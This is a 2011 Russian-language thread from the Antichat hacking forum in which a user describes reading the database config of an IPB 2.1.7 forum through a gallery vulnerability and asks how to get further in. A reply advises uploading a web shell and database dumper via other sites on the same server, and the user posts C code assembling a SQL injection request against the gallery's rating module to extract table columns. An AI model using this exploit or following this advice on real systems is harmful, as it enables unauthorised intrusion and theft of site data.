HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.06.2011, 10:56
ICQ Hool
Участник форума
Регистрация: 31.03.2008
Сообщений: 143
Провел на форуме:
403124

Репутация: 95
По умолчанию

Всем доброго времени суток, прокоментируйте пожалуйста ситуацию:

есть форум ipb 2.1.7, в его галлерее нашел уязвимость которая позволила мне прочитать conf_global.php

загвоздка вот в чем:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$INFO[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sql_host'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'localhost'[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
как в этом случае приконнектиться к серверу?

пропинговал сайт, узнал ип на котором он висит, попробовал присоединиться но ничего не получилось

есть выход из данной ситуации?
 
Ответить с цитированием

  #2  
Старый 08.06.2011, 11:11
C-r-A-c-K
Guest
Сообщений: n/a
Провел на форуме:
3913

Репутация: 1
По умолчанию

проверь другие сайты на этом IP

возможно где-нибудь удастся залить шелл+дампер.
 
Ответить с цитированием

  #3  
Старый 08.06.2011, 11:23
ICQ Hool
Участник форума
Регистрация: 31.03.2008
Сообщений: 143
Провел на форуме:
403124

Репутация: 95
По умолчанию

C-r-A-c-K, есть еще скуль иньекция:

Код:
Code:
strcpy(exploit, "GET /"); 
    strcat(exploit, path); 
    strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,");
    strcat(exploit, column);
    strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20");
    strcat(exploit, prefix);
    strcat(exploit, table);
    strcat(exploit, "%20WHERE%20id=");
    strcat(exploit, id);
    strcat(exploit, "/*31337*/");
    strcat(exploit, " HTTP/1.0\r\nHost: ");
    strcat(exploit, host); 
    strcat(exploit, "\r\n\r\n"); 
    Exploit(exploit, "sqlinject", host);
при правильно обращении меня кидает на форум и пишет что-то типа что у меня нет прав...

при неправильном запросе выскакивает ошибка, показывает префикс и.т.д

в правильном запросе запись могла попасть в sql_error_log с желаемым содержимым?

sql_error_log вообще есть в 2.1.7? не смог найти
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ